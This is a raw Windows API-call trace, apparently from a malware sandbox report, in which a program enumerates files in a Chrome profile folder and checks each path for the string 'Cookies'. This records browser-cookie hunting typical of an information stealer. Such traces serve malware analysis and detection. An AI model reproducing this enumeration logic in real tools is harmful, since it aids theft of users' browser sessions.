1 [0163.120] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_reduction_proxy_leveldb", cAlternateFileName="DATA_R~1")) returned 1 [0163.120] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0163.120] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0163.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.120] lstrlenW (lpString="\\") returned 1 [0163.120] GetProcessHeap () returned 0x8e0000 [0163.120] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.120] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.120] lstrlenW (lpString="data_reduction_proxy_leveldb") returned 28 [0163.120] GetProcessHeap () returned 0x8e0000 [0163.120] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925550 [0163.120] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.120] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.120] GetProcessHeap () returned 0x8e0000 [0163.120] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.120] lstrlenW (lpString="\\*.*") returned 4 [0163.120] GetProcessHeap () returned 0x8e0000 [0163.120] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925630 [0163.120] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*" [0163.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.121] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.122] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0163.122] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.122] lstrlenW (lpString="\\") returned 1 [0163.122] GetProcessHeap () returned 0x8e0000 [0163.122] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0163.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.122] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.122] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0163.122] lstrlenW (lpString="000003.log") returned 10 [0163.122] GetProcessHeap () returned 0x8e0000 [0163.122] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xe8) returned 0x9257f8 [0163.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" [0163.199] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.199] GetProcessHeap () returned 0x8e0000 [0163.199] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0163.199] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpSrch="Cookies") returned 0x0 [0163.199] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.199] GetProcessHeap () returned 0x8e0000 [0163.199] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0163.199] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0163.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.199] lstrlenW (lpString="\\") returned 1 [0163.199] GetProcessHeap () returned 0x8e0000 [0163.199] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0163.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0163.200] lstrlenW (lpString="CURRENT") returned 7 [0163.200] GetProcessHeap () returned 0x8e0000 [0163.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xe2) returned 0x9257f8 [0163.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" [0163.200] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.200] GetProcessHeap () returned 0x8e0000 [0163.200] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0163.200] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT", lpSrch="Cookies") returned 0x0 [0163.200] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.200] GetProcessHeap () returned 0x8e0000 [0163.200] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0163.200] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0163.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.200] lstrlenW (lpString="\\") returned 1 [0163.200] GetProcessHeap () returned 0x8e0000 [0163.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0163.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0163.200] lstrlenW (lpString="LOCK") returned 4 [0163.200] GetProcessHeap () returned 0x8e0000 [0163.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xdc) returned 0x9257f8 [0163.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" [0163.201] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0163.201] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK", lpSrch="Cookies") returned 0x0 [0163.201] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0163.201] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0163.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.201] lstrlenW (lpString="\\") returned 1 [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0163.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0163.201] lstrlenW (lpString="LOG") returned 3 [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x9257f8 [0163.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" [0163.201] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0163.201] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG", lpSrch="Cookies") returned 0x0 [0163.201] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.201] GetProcessHeap () returned 0x8e0000 [0163.201] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0163.201] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0163.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0163.202] lstrlenW (lpString="\\") returned 1 [0163.202] GetProcessHeap () returned 0x8e0000 [0163.202] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0163.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0163.202] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0163.202] lstrlenW (lpString="MANIFEST-000001") returned 15 [0163.202] GetProcessHeap () returned 0x8e0000 [0163.202] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf2) returned 0x9257f8 [0163.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0163.202] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" [0163.202] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.202] GetProcessHeap () returned 0x8e0000 [0163.202] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 